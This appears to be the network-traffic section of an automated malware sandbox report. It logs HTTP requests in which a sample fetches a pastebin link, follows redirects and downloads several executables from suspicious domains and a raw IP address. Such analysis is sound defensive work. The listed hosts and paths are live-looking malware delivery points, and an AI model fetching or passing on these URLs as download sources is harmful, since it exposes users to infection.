Network Analysis

GET /raw/xYhKBupz HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:56:11 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 915 Last-Modified: Wed, 18 Oct 2023 22:40:56 GMT Server: cloudflare CF-RAY: 81845f86f88e3149-LAX

GET /7a54bdb20779c4359694feaa1398dd25.exe HTTP/1.1 Host: grabyourpizza.com Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Wed, 18 Oct 2023 22:56:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6yKdK1ZVIBSyP5RYwsgp%2BNdINrkQ5KJknag8L0CIPuFwBWrn3jLi3hYJvbGPz1%2B7skcbJLqLrAj1Ie%2FZ%2BCXvKXcvgg3PvGEY7m3pLyQ8spztF1Tts2r67h2xBe82UfV%2FmhNNvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845f88b889830e-KIX alt-svc: h3=":443"; ma=86400

GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1 Host: flyawayaero.net Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Wed, 18 Oct 2023 22:56:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T8CVobC3QAZKdMz1bAF7Gme7gFVEV6TiarKxz1TE6SwMgT1m4bfcE51L%2BObAfTLvNiO%2BNb1cGKLcyw8phPMexcUSrf5pEA%2BbSF0BstI0uG2iHscBLQUeQQhI2QPqQ33Z3o4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845f88e85a2047-NRT alt-svc: h3=":443"; ma=86400

GET /4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe HTTP/1.1 Host: diplodoka.net Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:56:13 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4369296 Connection: keep-alive Last-Modified: Wed, 18 Oct 2023 20:34:10 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=grktyvpVLdWUhqKH%2BjW8tmIuy4mpPlynkCKl9qsuiFTIhCQBSI3LXTINAcvn6BcyEcs44Xkefwcd3V0UoKYenqEaTIf%2FRO22cbXKwwXyd%2BJsU8G6q8K3MCaCzh8ninQR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845f8d08edaf36-NRT alt-svc: h3=":443"; ma=86400

GET /4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1 Host: potatogoose.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:56:13 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4369264 Connection: keep-alive Last-Modified: Wed, 18 Oct 2023 20:34:08 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0RbDAHMv6SVtDtmQiT%2BemD3kGG7V%2FCAX5w8pb1bOYjYjmmZIKJXGQLUA99wme0NflRXnYojQyha6hBS%2FTvegF%2FGCMdUevsYpHTURRUxyhOAuXdaRFyZqeT4zGPgGUxfY%2FPg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845f8d094d8d10-KIX alt-svc: h3=":443"; ma=86400

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Oct 2023 22:56:13 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Content-Disposition: attachment; filename=OperaSetup.exe ETag: "5c59df5bc464917b8c2335d1c280edf6" Strict-Transport-Security: max-age=31536000; includeSubDomains

GET /files/My2.exe HTTP/1.1 Host: 85.217.144.143 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:56:12 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Thu, 12 Oct 2023 02:11:41 GMT ETag: "53d718-6077b75f2e86b" Accept-Ranges: bytes Content-Length: 5494552 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /downloads/toolspub1.exe HTTP/1.1 Host: galandskiyher5.com Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 18 Oct 2023 22:56:12 GMT Content-Type: application/x-msdos-program Content-Length: 268800 Connection: close Last-Modified: Wed, 18 Oct 2023 22:56:01 GMT ETag: "41a00-608058b16709c" Accept-Ranges: bytes

GET /build.exe HTTP/1.1 Host: gobo02fc.top Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Oct 2023 22:56:12 GMT Content-Type: application/octet-stream Content-Length: 381440 Connection: keep-alive Last-Modified: Wed, 18 Oct 2023 20:04:33 GMT ETag: "5d200-6080325dc6030" Accept-Ranges: bytes

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 18 Oct 2023 23:56:11 GMT Date: Wed, 18 Oct 2023 22:56:11 GMT Connection: keep-alive

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 18 Oct 2023 22:56:12 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 18 Oct 2023 23:56:12 GMT Date: Wed, 18 Oct 2023 22:56:12 GMT Connection: keep-alive